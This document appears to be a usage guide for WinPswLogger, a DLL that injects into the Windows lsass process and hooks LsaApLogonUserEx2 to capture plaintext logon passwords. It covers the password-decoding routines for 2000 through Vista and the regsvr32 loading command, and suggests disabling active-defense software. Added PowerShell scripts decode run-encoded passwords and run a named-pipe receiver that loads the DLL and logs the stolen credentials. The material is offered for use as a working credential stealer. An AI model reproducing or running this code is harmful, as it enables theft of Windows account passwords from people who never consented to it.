Windows authentication ultimately happens inside the lsass process. By default the authentication package is msv1_0.dll, and the function that matters is its export LsaApLogonUserEx2.
This program injects code into the lsass process and hooks LsaApLogonUserEx2 to intercept passwords. Any authentication that goes through that package triggers LsaApLogonUserEx2, including IPC$ connections, runas, and 3389 (Remote Desktop) logons.

The version-specific handling is taken care of, so interception works on 2000, 2003, XP and Vista:

On 2000, 2003 and XP the password may be run-encoded: the XOR seed is carried in the high 8 bits of UNICODE_STRING.Length, and the password is decoded with ntdll.RtlRunDecodeUnicodeString.
On Vista, AdvApi32.CredIsProtectedW is used to determine whether the password is protected, and if so it is decoded with AdvApi32.CredUnprotectW.

You can attach a debugger to lsass and watch this happen yourself :)
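As an added illustration (this is not WinPswLogger's own code), the PowerShell below reproduces the 2000/2003/XP decoding step described above on a current Windows box: it run-encodes a constructed sample password with ntdll's RtlRunEncodeUnicodeString, packs the seed into the high 8 bits of UNICODE_STRING.Length the way the hook would see it, and recovers the plaintext with RtlRunDecodeUnicodeString. The fixed seed, the sample password and the Decode-LsaPassword function name are my own choices; the Vista CredIsProtectedW/CredUnprotectW path is not shown.

```powershell
# Added example: emulate the run-encoded password a hook on LsaApLogonUserEx2 sees
# on 2000/2003/XP and decode it. Not WinPswLogger's code; names are placeholders.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING
{
    public ushort Length;        // length in BYTES, not characters
    public ushort MaximumLength;
    public IntPtr Buffer;
}

public static class NtDll
{
    // VOID RtlRunEncodeUnicodeString(PUCHAR Hash, PUNICODE_STRING String);
    [DllImport("ntdll.dll")]
    public static extern void RtlRunEncodeUnicodeString(ref byte Hash, ref UNICODE_STRING Str);

    // VOID RtlRunDecodeUnicodeString(UCHAR Hash, PUNICODE_STRING String);
    [DllImport("ntdll.dll")]
    public static extern void RtlRunDecodeUnicodeString(byte Hash, ref UNICODE_STRING Str);
}
'@

# What the hook has to do with the Password UNICODE_STRING it is handed:
# the XOR seed rides in the high 8 bits of Length, the real byte length in the low 8.
function Decode-LsaPassword {
    param([UNICODE_STRING]$Encoded)
    $seed = [byte]($Encoded.Length -shr 8)
    $Encoded.Length = [uint16]($Encoded.Length -band 0xFF)
    if ($seed -ne 0) {                      # seed 0 means the password was not encoded
        [NtDll]::RtlRunDecodeUnicodeString($seed, [ref]$Encoded)
    }
    [Runtime.InteropServices.Marshal]::PtrToStringUni($Encoded.Buffer, [int]($Encoded.Length / 2))
}

# --- Build a constructed sample the way LSA would hand it to the package ---
$plain = 'S3cret!pa55'                                   # constructed sample, not real data
$bytes = [Text.Encoding]::Unicode.GetBytes($plain)
$buf   = [Runtime.InteropServices.Marshal]::AllocHGlobal($bytes.Length)
[Runtime.InteropServices.Marshal]::Copy($bytes, 0, $buf, $bytes.Length)

$us = New-Object UNICODE_STRING
$us.Length        = [uint16]$bytes.Length
$us.MaximumLength = [uint16]$bytes.Length
$us.Buffer        = $buf

[byte]$seed = 0x5A                                       # fixed seed for a repeatable demo; 0 makes ntdll pick one
[NtDll]::RtlRunEncodeUnicodeString([ref]$seed, [ref]$us)
$us.Length = [uint16](([int]$seed -shl 8) -bor $us.Length)   # seed packed into the high byte

$hex = (0..($bytes.Length - 1) | ForEach-Object {
    '{0:X2}' -f [Runtime.InteropServices.Marshal]::ReadByte($buf, $_) }) -join ' '
"Encoded bytes : $hex"
"Length field  : 0x{0:X4} (seed 0x{1:X2}, {2} bytes)" -f $us.Length, ($us.Length -shr 8), ($us.Length -band 0xFF)

$recovered = Decode-LsaPassword $us
"Recovered     : $recovered"
if ($recovered -ne $plain) { throw "round-trip failed" }

[Runtime.InteropServices.Marshal]::FreeHGlobal($buf)
```

Because the real length is confined to the low 8 bits of Length, this packing only works for passwords of up to 127 UTF-16 characters, which is why the hook must mask the field before reading the buffer.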
======== Interface:
HRESULT WINAPI DllInstall (BOOL bInstall, LPCWSTR pszCmdLine );
This is the prototype of the function the DLL exports. Don't be fooled by the name: this program is "green" (portable). The function performs no installation action at all and does not modify the registry or system files; the name was chosen only so that regsvr32 can call it through a standard interface.

The first parameter is ignored.
The second parameter is a file path (note: UNICODE). The captured data is written there (as ANSI). The path can be an ordinary file such as C:\x.log,
a named pipe such as \\.\pipe\your_pipename,
or a mailslot such as \\.\mailslot\yourslot.
So you can write your own loader that calls the DLL and have the DLL send the intercepted password data to your program over the pipe or mailslot. The data is a string (ANSI).
======== Check:
If you don't want to write your own loader right away, you can use regsvr32 as the loader to test it (you may need to turn off some active-defense software first):
regsvr32 /n /i:c:\xxx.log c:\plugin\WinPswLogger.dll
If all is well, regsvr32 pops up a success prompt. You can then switch user or lock the computer and log back in; the password intercepted during that logon is saved to c:\xxx.log.
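Added example (not part of WinPswLogger): a PowerShell receiver that uses the pipe form of the second parameter instead of a log file. It stands up a named-pipe server, then uses regsvr32 as the loader exactly as in the check above but with \\.\pipe\<name> in place of the log path, and appends whatever arrives to a file. The pipe name, DLL path and output file are placeholders. It assumes, as the interface description implies, that the DLL opens the given path, writes one ANSI string and closes it for each intercepted logon; the page does not spell that out, so adjust the read loop if the DLL keeps its handle open.

```powershell
# Added example: receive WinPswLogger output over a named pipe instead of a log file.
# Not the tool's own code. Run from an elevated Windows PowerShell (5.1) prompt.
$PipeName = 'your_pipename'                  # placeholder; any name works
$DllPath  = 'c:\plugin\WinPswLogger.dll'     # placeholder path to the DLL
$OutFile  = Join-Path $env:TEMP 'captured.log'

# 1. The server end must exist before the DLL tries to open \\.\pipe\<name> from lsass.
#    lsass runs as SYSTEM, which the default pipe DACL allows to connect and write.
$server = [System.IO.Pipes.NamedPipeServerStream]::new(
    $PipeName,
    [System.IO.Pipes.PipeDirection]::In,
    1,                                        # one instance: one writer at a time
    [System.IO.Pipes.PipeTransmissionMode]::Byte,
    [System.IO.Pipes.PipeOptions]::None)

# 2. Load the DLL with regsvr32 as the loader (as in the check section), passing the pipe.
#    /n skips DllRegisterServer, /i:<cmdline> calls DllInstall, /s suppresses the prompt.
$regArgs = "/n /s /i:\\.\pipe\$PipeName `"$DllPath`""
$p = Start-Process -FilePath regsvr32.exe -ArgumentList $regArgs -Wait -PassThru
if ($p.ExitCode -ne 0) { throw "regsvr32 failed with exit code $($p.ExitCode)" }
Write-Host "DLL loaded; waiting for logons on \\.\pipe\$PipeName (Ctrl+C to stop)"

# 3. Each intercepted logon is assumed to be one connect / write / close from lsass.
#    The data is an ANSI string, so decode with the system ANSI code page.
$ansi = [System.Text.Encoding]::Default
while ($true) {
    $server.WaitForConnection()
    $ms = New-Object System.IO.MemoryStream
    $server.CopyTo($ms)                       # returns when the writer closes its end
    $server.Disconnect()
    $text = $ansi.GetString($ms.ToArray()).Trim()
    if ($text) {
        $line = "{0:yyyy-MM-dd HH:mm:ss} {1}" -f (Get-Date), $text
        Add-Content -Path $OutFile -Value $line
        Write-Host $line
    }
}
```

Start this script before the logon you want to observe; regsvr32 returns as soon as DllInstall has done the injection, and the pipe only sees traffic when LsaApLogonUserEx2 fires later.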
========= Finish